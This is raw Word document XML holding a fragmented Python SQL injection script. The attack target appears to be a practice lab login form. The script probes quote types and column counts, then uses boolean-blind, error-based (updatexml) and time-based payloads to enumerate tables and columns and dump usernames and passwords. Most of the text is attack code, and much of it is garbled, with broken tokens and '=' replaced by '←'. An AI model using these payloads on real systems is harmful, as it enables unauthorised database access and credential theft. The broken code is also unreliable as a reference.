    <w:p w14:paraId="01B9762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}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42F62E8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6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←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7963B6A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7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←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01630BB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8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←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4FC47C3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exist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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE079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0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s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col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+ j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D55D2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1. Outp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(cols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64923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2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s_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col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 + cols + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C492B8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3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←cols</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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: -2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E17D00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return ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295862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D482A5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1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column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oo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348DDAF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s_ ←''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41173EB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5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CE5A7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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E71222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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25372DD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{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="50E699D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: symbol + " or (select length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umn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from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schema.column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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A906A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" where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'users' limit " + st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+ ",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)=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{0}#".format(i),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24701E7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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4C814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1E07A14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=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25C24A8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=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29B2DA7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=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4D72E50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.jp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" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8744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length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</w:p>
    <w:p w14:paraId="642115D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lastRenderedPageBreak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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644EC6D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s ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2F371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list(set(ch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.lower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 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1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27))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761596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ength + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAF9B6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j in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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9E09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3258D0D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   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: symbol + " or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select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umn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from "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450FB3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"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chema.column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where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←'user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 "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C1189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     "limit " + st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+ ",1),{0},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)←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{1}'#".format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j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D801A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     'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C496D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64DAF2B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3E9F57E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01FC6D4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4BF8D1E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A2D1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31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s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col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+ j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC1B55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2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s_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col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 + cols + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E566B1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 ← cols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: -2].split(', ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34587E2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_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED25C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5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ret_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re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 +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3] + ', ' + ret[4]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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CEAA7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return ret_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F78E5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F7DA9D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value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oo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52EA070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ength ← 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771C9AE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users ← []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F06A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nd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0 to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15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E144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if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!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 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113B92D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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D602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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDBA6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        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: symbol + f" or (select length(username) from users where id={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})=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{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}#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4644CC7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9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'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5865FE2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0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5BD2F13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467D5BF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523D21E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0E49EC8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" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4504334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length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</w:p>
    <w:p w14:paraId="4D2F75F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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD82C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users_ ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E3A3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for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ange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32, 127)]     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD60B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lastRenderedPageBreak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ength + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63766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j in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</w:p>
    <w:p w14:paraId="65C1991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4F1BF5F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2.     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: symbol + " or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ascii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(select username "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB86F1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"from users limit " +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tr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- 1) + ",1),{0},1))={1}#".format(i, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B3F3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'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D05FEA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2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1A07DB7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3A7B02B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1C2470A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3D01F99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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD1615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0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users_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user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 + chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E90ED2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1.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sers.append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users_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E6A5C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users_ ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53723DD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0BA978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3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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7153E1A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nd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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A045B5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if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!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 13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431281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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBF47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7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F3C1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8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: symbol + f" or (select length(password) from users where id={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})=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{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}#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1591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9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  'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF357D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0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687DAB7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_len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3827142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_l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4E3DBB1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313E684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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42330AE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length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</w:p>
    <w:p w14:paraId="3B358EE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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B888C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7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 ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126488C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8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0 to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127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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0C4A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length + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE57D5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j in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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105FBF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7DA04DF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2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: symbol + " or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ascii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ubst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(select password "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC7DD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"from users limit " +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tr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- 1) + ",1),{0},1))={1}#".format(i, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD3502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'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5EB5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29122B1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res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390B097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7775D47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 ←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7E65D88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lastRenderedPageBreak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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2431F0A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0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_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 +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chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9A5D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1.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wds.append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)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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608AD50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2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 ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C78A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3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Outp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\n%-12s%-12s' % ('username', 'password\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CFD6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s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w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zip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users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wd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78A2196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5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Outp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%-12s%-12s' % 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s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w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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB48A9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return 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1235692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60F8364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C3049B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1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o_bool_inject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2389397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, symbol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an_inject_boo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626E5C5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his_databas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xe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unc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, 'database()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED9C58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version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xe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unc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, 'version()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437BCE4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Success -&gt; ' + 'MySQL' + ' ' +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version.stri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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA4FB1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Database -&gt; ' +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his_database.stri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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7740986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table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oo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0422E64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column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oo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49EA1E2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5943DA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tables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table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oo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130ED87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Tables -&gt; ' +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s.stri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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B92ECB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Default Use Table users......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8F73F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columns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column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oo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30604B2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Columns -&gt; ' +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umns.stri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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793100F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Try to get Data........\n\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680015F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Outp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6656C08D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925C0A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if 1 ==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value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oo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285DBCC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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F20423D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0399E220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1848F6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57F7CCE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6E39864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45A1EF3" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>post.err</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40623C5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content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B1134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his_ti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ime.strftime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'%H:%H:%S',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ime.localti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ime.ti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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E079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print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ored('[' + st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his_ti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+ ']', 'green') + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B6733D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36FD243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3E22BC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_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B6708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data_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encod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data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007887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data_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.encode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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C0C0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.urlopen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=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=data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535987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 str(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.read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).decode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64262E38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7C80E42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0D7D3B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an_injec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32E2EAB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st_li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["'", '")', "')", '"']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653BF1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item in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st_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15D6567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5AC07BF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: "admin" + str(item) + " union select 1←1,2#"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2560469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'passwd': "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7980C78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5C725FA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ult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st_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2ACB6D2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ult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5926ED1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45639F7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la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"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E8A27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Use ' + item + ' -&gt; Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CACB49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 True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589837F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lse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8641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Use ' + item + ' -&gt; Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711479E7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99591E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A0BE01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est_order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y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74A034D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lag = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4117B9D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i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0 to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50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4641BE6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4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Order By Test -&gt; ' + st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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331757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7B73409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: 'admin' + symbol + ' order by ' + st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+ '#',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F82118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    'passwd': "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE79A9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8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</w:p>
    <w:p w14:paraId="4F22B3A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ult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0152DFD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ult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6363051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m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68C71B1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content ← str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0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396767E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1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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0A9A6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fonts1[0] not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exis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Logi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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2612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Output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No render......")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E6A33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 '0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C101A5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l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se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if "slap" in content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D07A9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log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Order By Test Success -&gt; order by ' + str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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FACE2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lag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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28C3F1A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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A9B8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 flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCD67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84D7AD1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F6D5A0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xec_function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r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, function)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122BF9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global res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1DCF6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4BAAE62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: symbol + " and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pdatexm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,concat(0x7e,(" + function + "),0x7e),1)#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764B6AE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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46514E3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}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3831E78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ult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6D8CCAB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ult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4D4994B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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA056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content ←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].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390EBFC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try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFE9F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 ←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.findall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.*~(.*)~.*', content)[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1F9D2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xcept Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DD5EC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o_bool_inject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2C8AB2C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 res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8F04E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6C27B7C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AC2262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database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r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153EB6D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21F9BFB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"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": "1" + symbol + " and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pdatexm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,concat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0x7e,(database()),0x7e),1)#"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053D506A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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C42A011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}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4303707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ult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75FD3E5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if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ult.find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MySQL') !← -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4E9982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 'MySQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5563BF5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lse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB0E99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 'Cannot get database'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD1B8C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7016826D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A96951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table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r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6DE3941C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4EB5EBC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uname': "1" + symbol + " and 1 union select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,updatexml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(1,concat(0x7e,(select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group_concat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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342444E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" from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chema.table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schema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'security' limit 0,1),0x7e),1)#"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E754B6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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DAB2A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505148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t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5EF140A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684B318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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B895A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t ←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].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F51568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try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E71110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tb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.findall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.*~(.*)~.*', ret)[0].split(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6CB7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except Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D7E46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o_bool_inject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0C6307F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tbs_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E34299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tb in tbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422CC14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8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tbs_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tb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 + tb + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE98F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 tbs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: -2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EA746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49A41214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656677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columns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r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2BCB8CF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 ← {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEC49B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: "1" + symbol + " and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pdatexm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1,concat(0x7e,(select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group_concat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umn_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 "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D56EE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"from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information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chema.column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where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able_name←'user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 limit 0,1),0x7e),1)#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BE02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6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     'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA2B19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}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                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E832ED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t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59A8D12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3C6CF0A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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A146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t ←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].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCEBC4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col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.findall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.*~(.*).*', ret)[0].split(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121963A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s_ ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310ED8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r col in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: -1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7581E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cols_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←col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 + col + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160457C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turn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cols</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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:-2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA91CD4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5C3C42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24A30BD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1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get_data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er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symbol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CB18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data← {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7467D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3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': "1" + symbol + " and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pdatexm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1,concat(0x7e,(select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4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group_concat(username,0x3a,password) "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC028A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5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"from users limit 0,2),0x7e),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)#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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE46A1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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C6722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7.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}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="751744A5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8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ult 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end_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ques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ur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, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B16A66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9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soup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BeautifulSou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ult, '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html.parse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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B99A7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0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font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soup.find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_al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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14528A44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1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←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nt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1].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8F0A13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2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.findall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.*~(.*)', res)[0].split(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33825DA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3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res_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ic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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4FDF4F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4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for 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in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: -1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236950B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5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m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←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d.split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(':')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73009B70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16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s_[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m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[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0]]←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lang w:bidi="ar"/>
        </w:rPr>
        <w:t>tmp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lang w:bidi="ar"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79580CB9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17.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return res_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED0AEB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3DC8C0F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59A0D87E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ost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E3C28" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_time_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737690F6" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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res, symbol ← </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>can_inject_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A423AE" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this_database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> ←</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exe_func_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol,'database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F99CDC" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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tables ← </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_tables_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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symbol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600364CF" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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columns ← </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_columns_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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symbol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F3E93" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_values_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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symbol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E509B63" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00924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  <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75662D42" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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can_inject_time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14:paraId="6BE32666" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> ← [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"'"</w:t>
      </w:r>
      <w:r>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'")'</w:t>
      </w:r>
      <w:r>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"')"</w:t>
      </w:r>
      <w:r>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'"'</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044506C7" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t> item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6721AD2C" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>        data ←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name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"admin"</w:t>
      </w:r>
      <w:r>
        <w:t> + item + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'and 1=1#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FD699F" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>url</w:t>
